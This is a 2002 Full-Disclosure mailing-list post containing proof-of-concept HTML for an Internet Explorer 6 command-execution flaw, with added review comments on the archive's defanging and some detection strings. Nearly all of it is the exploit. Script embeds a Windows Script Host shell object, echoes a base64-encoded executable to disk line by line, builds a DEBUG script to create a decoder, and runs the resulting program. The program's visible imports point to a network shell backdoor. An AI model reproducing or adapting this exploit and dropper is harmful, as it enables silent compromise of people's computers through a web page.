[Full-Disclosure] Re: IE 6.x embedded command execution vulnerability #1033

From: gh b (full-disclosure@lists.netsys.com)
Date: 08/15/02


From: full-disclosure@lists.netsys.com (gh b)
Date: 15 Aug 2002 09:30:02 -0000


<html>
<!--
  Review note: this is proof-of-concept markup as stored by the mailing-list archive.
  The archive has neutralised it (DEFANGED_ tag prefixes, /" and /' where quotes stood)
  and has hard-wrapped the long script line, so the text below documents the technique
  and is not a loadable page as shown.
  NOTE(review): the advisory text (affected builds, fix status) is not part of this
  message; take it from the original thread.
-->
<DEFANGED_body>
<!--
  Embeds an ActiveX control by CLSID and names it `s`. This CLSID is commonly documented
  as Scriptlet.TypeLib (confirm on an affected build). The script uses only Reset(), Doc
  and write() on it.
-->
<DEFANGED_OBJECT id=/"s/" classid=/"clsid:06290BD5-48AA-11D2-8432-006008C3FBFC/" width=/"14/" height=/"14/" >
</OBJECT>
<DEFANGED_script>
// Order of operations in this script: Reset(), then Doc is assigned one long HTML string,
// then write() is called on the same object at the very end.
// The string assigned to Doc declares a second object `w`
// (clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B, commonly documented as the Windows Script
// Host shell object; confirm) and a script that calls w.Run() many times.
// Those Run() calls use `command /c echo ... >E` / `>>E` and `>S` / `>>S` to build two
// files piece by piece, then pass S to DEBUG and start the program it produces.
// Where write() stores the Doc content is not shown in this message. TODO confirm.
// Strings a defender can match on in web or mail content: either CLSID above, a run of
// `command /c echo` appends from script, and `DEBUG <` fed from a script-built file.
s.Reset();
s.Doc=/"<DEFANGED_object id=/'w/' classid=/'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B/'></object><DEFANGED_SCRIPT>w.Run(/'command /c echo TVqQAAMAAAAEAAAA..8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbg>E/',false,6);w.Run(/'command /c echo BTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABdFx3bGXZziBl2c4gZdnOIGXZziA>>E/',false,6);w.Run(/'command /c echo p2c4jlVmGIGHZziFJpY2gZdnOIAAAAAAAAAABQRQAATAEDAJistDkAAAAAAAAAAOAADwELAQUMAAQAAADKAAAAAAAAABAAAAAQA>>E/',false,6);w.Run(/'command /c echo AAAIAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAAAQAABAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAEAgAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA8AIAAAAQAAAABAAAAA>>E/',false,6);w.Run(/'command /c echo QAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAADYBAAAAIAAAAAIAAAAIAAA
AAAAAAAAAAAAAAABAAABALmRhdGEAAAAoxgAAADAAA>>E/',false,6);w.Run(/'command /c echo AACAAAACgAAAAAAAAAAAAAAAAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgUMEAAaAEBAADotwIAAG>>E/',false,6);
w.Run(/'command /c echo oGagFqAujQAgAAo6IxQABmxwWmMUAAAgDHBaoxQAAAAAAAZscFqDFAAB5hahBopjFAAP81ojFAAOiFAgAAagX.NaIxQADofgIAA>>E/',false,6);w.Run(/'command /c echo DLAorYxQACitzFAALirEUAAaMgxQABqAGoAUGoAagDoKgIAALglEkAAaMwxQABqAGoAUGoAagDoEgIAAGj6AAAA6BoCAACgtjFA>>E/',false,6);w.Run(/'command /c echo AIodtzFAACLDPAB05ccF2DFAAEQAAADHBdwxQAAAAAAAxwXgMUAAAAAAAMcF5DFAAAAAAADHBQQyQAABAQAAZscFCjJAAAAAxwU>>E/',false,6);w.Run(/'command /c echo MMkAAAAAAAKHAMUAAoxAyQAChxDFAAKMUMkAAoxgyQABmxwUIMkAAAADHBZT1QACUAAAAaJT1QADoggEAAIM9pPVAAAJ1JGgcMk>>E/',false,6);w.Run(/'command /c echo AAaNgxQABqAGoAagBqAWoAagBoADBAAGoA6EsBAADrImgcMkAAaNgxQABqAGoAagBqAWoAagBoCDBAAGoA6CcBAADHBTwyQAAQA>>E/',false,6);w.Run(/'command /c echo AAAaDwyQABoLDJAAP81ojFAAOgyAQAAo0AyQABo gAAAOgRAQAA69BVi yDxOzHRfQMAAAAx0X4AAAAAMdF.AEAAABqAI1F9FBo>>E/',false,6);w.Run(/'command /c echo vDFAAGjAMUAA6MEAAADGBbYxQAABaPoAAADozgAAAGoAaKhhAABo7JNAAP81QDJAAOjbAAAAiUXwagCNRexQ.3XwaOyTQAD.Nbw>>E/',false,6);w.Run(/'command /c echo xQADooQAAAOvBycIEAFWL7IPE8MdF9AwA
AADHRfgAAAAAx0X8AQAAAGoAjUX0UGjEMUAAaLgxQADoRwAAAMYFtzFAAAFo gAAAO>>E/',false,6);w.Run(/'command /c echo hUAAAAagCNRfBQaKhhAABoRDJAAP81uDFAAOgzAAAAagD.dfBoRDJAAP81QDJAAOhOAAAA68TJwgQA.yUYIEAA.yUAIEAA.yUEI>>E/',false,6);w.Run(/'command /c echo EAA.yUIIEAA.yUMIEAA.yUQIEAA.yUUIEAA.yUgIEAA.yUkIEAA.yUoIEAA.yUsIEAA.yUwIEAA.yU0IEAA.yU4IEAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKIAAA3CAAAOwgAAD8IAAACCEAABAhAAC8IAAAAAAA>>E/',false,6);w.Run(/'command /c echo AHMAAIABAACAAgAAgA0AAIAQAACAEwAAgBcAAIAAAAAAfCAAAAAAAAAAAAAAHCEAAAAgAACcIAAAAAAAAAAAAAAqIQ
AAICAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAyiAAANwgAADsIAAA.CAAAAghAAAQIQAAvCAAAAAAAABzAACAAQAAgAIAAIANAACAEAAAgBMAAI>>E/',false,6);w.Run(/'command /c echo AXAACAAAAAAEEAQ3JlYXRlUGlwZQAAQgBDcmVhdGVQcm9jZXNzQQAASABDcmVhdGVUaHJlYWQAAGABR2V0VmVyc2lvbkV4QQD9A>>E/',false,6);w.Run(/'command /c echo VJlYWRGaWxlAABzAlNsZWVwALkCV3JpdGVGaWxlAEtFUk5FTDMyLmRsbAAAV1NPQ0szMi5kbGwAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNtZC5leGUAY29tbWFuZC5jb20AAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>E/',false,6);w.Run(/'command /c echo NDEC.COM>S/',false,6);w.Run(/'command /c echo A>>S/',false,6);w.Run(/'command /c echo DW6DE9 4501 5800 5858 5858 2E58 5858 0058 7263 652E 6578 5900 592E 5959 0000>>S/',false,6);w.Run(/'command /c echo DW000C 0000 0000 3E00 0000 0000 0000 0000 0000 0000 3F00 3400 363
5 3837 3A39>>S/',false,6);w.Run(/'command /c echo DW3C3B 003D 0000 0000 0000 0100 0302 0504 0706 0908 0B0A 0D0C 0F0E 1110 1312>>S/',false,6);w.Run(/'command /c echo DW1514 1716 1918 0000 0000 0000 1B1A 1D1C 1F1E 2120 2322 2524 2726 2928 2B2A>>S/',false,6);w.Run(/'command /c echo DW2D2C 2F2E 3130 3332 0000 0000 0000 0000 B800 3D00 03BA CD01 7221 A35E 0121>>S/',false,6);w.Run(/'command /c echo DW01B8 BA3D 0103 21CD 5172 23A3 B401 8B3F 211E B901 0001 80BA CD01 7221 3D1E>>S/',false,6);w.Run(/'command /c echo DW0000 1974 3E80 0180 7220 B410 8B40 231E B901 0001 80BA CD01 7221 EB22 B4D2>>S/',false,6);w.Run(/'command /c echo DW8B40 231E 3301 CDC9 7221 B414 8B3E 211E CD01 7221 B40A 8B3E 231E CD01 7221>>S/',false,6);w.Run(/'command /c echo DWC300 DB33 1E8A 0180 EB80 8A20 2587 D001 D0E0 8AE0 811E 8001 20EB 8F8A 0125>>S/',false,6);w.Run(/'command /c echo DWE9D0 E9D0 E9D0 E9D0 C102 84A2 3301 8ADB 811E 8001 20EB 878A 0125 0F24 E0D0>>S/',false,6);w.Run(/'command /c echo DWE0D0 E0D0 E0D0 1E8A 0182 EB80 8A20 258F D001 D0E9 0
2E9 A2C1 0185 DB33 1E8A>>S/',false,6);w.Run(/'command /c echo DW0182 EB80 8A20 2587 2401 D003 D0E0 D0E0 D0E0 D0E0 D0E0 8AE0 831E 8001 20EB>>S/',false,6);w.Run(/'command /c echo DW8702 0125 86A2 C301 571E 14E8 72FF B87D 3D02 03BA CD01 7221 A373 0121 3CB4>>S/',false,6);w.Run(/'command /c echo DWC933 10BA CD01 7221 A365 0123 3FB4 1E8B 0121 04B9 BA00 0180 21CD 87A3 7201>>S/',false,6);w.Run(/'command /c echo DW3D1A 0000 1574 45E8 B4FF 8B40 231E B901 0003 84BA CD01 7221 EB37 B8D3 4200>>S/',false,6);w.Run(/'command /c echo DW1E8B 0123 0E8B 011F 168B 011D 21CD 2272 40B4 1E8B 0123 C933 21CD 1672 3EB4>>S/',false,6);w.Run(/'command /c echo DW1E8B 0121 21CD 0C72 3EB4 1E8B 0123 21CD 0272 C033 1F5F 4CB4 21CD 1672 3EB4>>S/',false,6);w.Run(/'command /c echo.>>S/',false,6);w.Run(/'command /c echo R CX>>S/',false,6);w.Run(/'command /c echo 01FA>>S/',false,6);w.Run(/'command /c echo W>>S/',false,6);w.Run(/'command /c echo Q>>S/',false,6);w.Run(/'command /c DEBUG <S/',false,6);w.Run(/'command /c DEC.COM/',false,6);w.Run(/phrack
.exe/');<//"+/"SCRIPT>/";s.write();
</script>
</body>
</html>